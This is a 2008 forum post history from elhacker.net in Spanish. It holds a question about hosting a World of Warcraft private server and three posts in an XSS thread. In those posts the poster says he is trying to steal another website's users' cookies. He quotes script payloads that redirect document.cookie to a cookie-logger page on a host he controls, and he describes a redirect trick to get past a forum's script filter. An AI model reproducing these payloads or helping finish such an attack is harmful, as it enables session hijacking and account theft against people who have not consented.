elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a Git (Primera Parte)


  Mostrar Mensajes
Páginas: 1 [2]
11  Media / Juegos y Consolas / Re: [Tutorial] Crear un servidor para WoW compatible con la versión 2.4.3 [Tutor en: 13 Agosto 2008, 19:03 pm
Ariath tío estoy que me ahorco jajaja ayúdame por favor :P

Te cuento, estoy instalando un ascent rev 4603 para la versión 2.4.2 (porque quiero esa jajaja). Vale tengo la BD de NewChapter (ncdb) montada perfectamente, y el emu me arranca perfectamente para Red Local.

El problema viene cuando intento lanzarlo al público. Tengo los puertos abiertos en el router, tengo el No-IP (configurado como DNS Host (A)) y configuro los archivos con midominio:puerto.

El caso es que a la hora de lanzar el ascent-realmserver me da el error siguiente:


Y cuando abro el Ascent me dice que no se encontró el dominio.

Haber si me puedes echar 1 mano :-(
12  Seguridad Informática / Nivel Web / Re: XSS - Mas allá del alert(); By: Tec-n0x en: 8 Julio 2008, 21:12 pm
Gracias por la respuesta pero no me ha valido o no he sabido colocarlo  :xD

Si queréis ver lo que sale el link de la web "trampa" que redirige está en www.pspandopower.com/prueba/index.php

Es una web de un hosting mio, por lo que estará permitido que lo ponga no? :D
13  Seguridad Informática / Nivel Web / Re: XSS - Mas allá del alert(); By: Tec-n0x en: 7 Julio 2008, 18:38 pm
Voy de problema en problema  :-\ >:(

Gracias a el método de yeikos he conseguido que me cargue las funciones del javascript con letras. Vale os voy a explicar así un poco para que sepaís que pretendo hacer:

Tengo una web "X" a la que le quiero sacar la cookie. Como en el foro no puedo utilizar <script></script>, se me ocurrió poner un link a un servidor mío a una página "Y" que con un meta refresh redirija a la página "X" pero con el XSS ya introducido en la URL.

Vale hasta ahora bien, todo funciona perfectamente hasta que llega a la mitad del script:

Citar
document.location=http://miweb.com/cookielogger.php?cookie + document.cookie

Vale el document.location lo realiza correctamente porque me redirige a cookielogger.php pero la cookie no aparece por ningún lado. Le he puesto un print para comprobarlo y me aparace ==> document.cookie. La cookie sigue desaparecida x'D

También he probdo con document.location=http://miweb.com/cookielogger.php?cookie= document.cookie, pero nada me sigue apareciendo document.cookie en vez de la cookie.

Me he quemado ya la cabeza de tanto pensar en que puede fallar y no se qué es, haber si me podéis echar una mano. Se me ha ocurrido de que al irse a mi hosting al no haber cookie no me la muestre, pero como le hago el location al otro hosting sí debería de aparecer :S no se, estoy confuso :S
14  Seguridad Informática / Nivel Web / Re: XSS - Mas allá del alert(); By: Tec-n0x en: 6 Julio 2008, 18:11 pm
Bueno soy nuevo en esta comunidad, sé que está algo antiguo el post pero no veo la necesidad de abrir otro si está relacionado con este tema.

El caso es que estoy trabajando en un tema, que es robar la cookie de un user. La web tiene un fallo para XSS sí, pero está capado como se dice en el tuto. Por ejemplo si uso un alert(1) me sale pero si pongo alert(ola) no. Se me ocurrió poner alert(/ola/) y funciona.

El caso es, tengo un cookie logger, entonces el script que le tengo que meter sería:

Citar
<script>document.location='http://lawebdelogger.com' +document.cookie</script>

Pero el caso es que el document.location no me lo carga.

Alguna sugerencia??
Páginas: 1 [2]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines